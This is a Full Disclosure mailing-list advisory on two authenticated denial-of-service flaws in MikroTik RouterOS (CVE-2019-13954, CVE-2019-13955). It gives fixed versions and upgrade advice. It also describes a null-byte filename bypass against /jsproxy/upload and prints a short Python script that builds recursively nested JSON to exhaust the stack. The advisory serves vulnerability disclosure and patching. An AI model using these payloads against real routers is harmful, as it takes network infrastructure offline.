https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Two vulnerabilities found in MikroTik's RouterOS
Advisory: two vulnerabilities found in MikroTik's RouterOS Details === Product: MikroTik's RouterOS Affected Versions: before 6.44.5 (Long-term release tree), before 6.45.1 (Stable release tree) Fixed Versions: 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree) Vendor URL: https://mikrotik.com/download/changelogs/long-term-release-tree Vendor Status: fixed version released CVE: CVE-2019-13954, CVE-2019-13955 Credit: Qian Chen(@cq674350529) of the Qihoo 360 Nirvan Team Product Description == RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point. Details of vulnerabilities == These two vulnerabilities were tested only against the MikroTik RouterOS 6.42.11 and 6.43.16 (Long-term release tree) when found. 1. CVE-2019-13954: memory exhaustion via a crafted POST request This vulnerability is similiar to the CVE-2018-1157. An authenticated user can cause the www binary to consume all memory via a crafted POST request to /jsproxy/upload. It's because of the incomplete fix for the CVE-2018-1157. Based on the poc for cve_2018_1157 provided by the @Jacob Baines (really appreciate!), crafting a filename ending with many '\x00' can bypass the original fix to trigger the vulnerability. 2. CVE-2019-13955: stack exhaustion via recuring parsing of JSON This vulnerability is similar to the CVE-2018-1158. An authenticated user communicating with the www binary can trigger a stack exhaustion vulnerability via recursive parsing of JSON containing message type M. Based on the poc for cve_2018_1158 provided by the @Jacob Baines (really appreciate!), crafting an JSON message with type M can trigger the vulnerability. A simple python script to generate the crafted message is as follows. msg = "{M01:[M01:[]]}" for _ in xrange(2000): msg = msg.replace('[]', "[M01:[]]") Solution Upgrade to RouterOS versions 6.44.5 (Long-term release tree), 6.45.1 (Stable release tree). References == [1] https://mikrotik.com/download/changelogs/long-term-release-tree [2] https://github.com/tenable/routeros ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/